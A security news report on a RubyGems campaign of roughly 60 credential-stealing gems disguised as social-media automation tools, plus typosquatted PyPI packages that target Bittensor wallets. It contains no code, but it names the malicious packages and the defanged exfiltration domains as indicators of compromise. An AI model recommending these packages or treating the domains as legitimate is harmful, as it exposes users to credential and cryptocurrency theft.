A new set of 60 malicious packages targeting the RubyGems ecosystem has been discovered. These packages masquerade as harmless automation tools for social media, blogging, and messaging platforms, but their true intent is to steal users’ credentials. The attack has been ongoing since at least March 2023, according to security firm Socket. In total, these gems have been downloaded over 275,000 times.
It’s important to note that this figure doesn’t necessarily reflect the actual number of compromised systems, as not every download leads to execution, and multiple downloads may have occurred on a single machine.
The malicious gems, published by threat actor aliases zon, nowon, kwonsoonje, and soonje, claimed to offer functionalities like bulk posting and engagement for platforms such as Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver. While they provided the promised services, they also contained hidden functionality that exfiltrated users’ usernames and passwords to an external server controlled by the attacker. A simple graphical user interface was used to trick users into entering their credentials.
Some of the malicious gems, such as njongto_duo and jongmogtolon, stand out for targeting financial discussion platforms. These libraries were marketed as tools to flood investment forums with ticker symbols, stock narratives, and synthetic engagement in an attempt to manipulate public perception and increase visibility.
The servers receiving the stolen information include programzon[.]com, appspace[.]kr, and marketingduo[.]co[.]kr, which have been found to advertise bulk messaging services, phone number scraping, and automated social media tools.
Victims of this campaign are likely to be grey-hat marketers who rely on such automation tools for spamming, SEO, and engagement campaigns designed to artificially boost visibility.
“Each gem acts as an infostealer targeting Windows systems, with a primary focus on South Korean users. This is evidenced by the Korean-language UIs and data exfiltration to .kr domains,” noted Socket. “The campaign has evolved across multiple aliases and infrastructure waves, indicating a highly persistent and sophisticated operation.”
“By embedding credential-stealing functionality within gems marketed to grey-hat users seeking automation tools, the attackers secretly capture sensitive data while blending in with seemingly legitimate activities.”
This development comes on the heels of GitLab’s discovery of multiple typosquatting packages on the Python Package Index (PyPI). These packages are designed to steal cryptocurrency from Bittensor wallets by hijacking legitimate staking functions. The affected Python libraries, which mimic bittensor and bittensor-cli, include:
- bitensor (versions 9.9.4 and 9.9.5)
- bittenso-cli
- qbittensor
- bittenso
“The attackers seem to have specifically targeted staking operations, likely for calculated reasons,” said GitLab’s Vulnerability Research team. “By hiding malicious code within seemingly legitimate staking functions, they exploited both the technical details and psychological factors associated with routine blockchain operations.”
Leave A Comment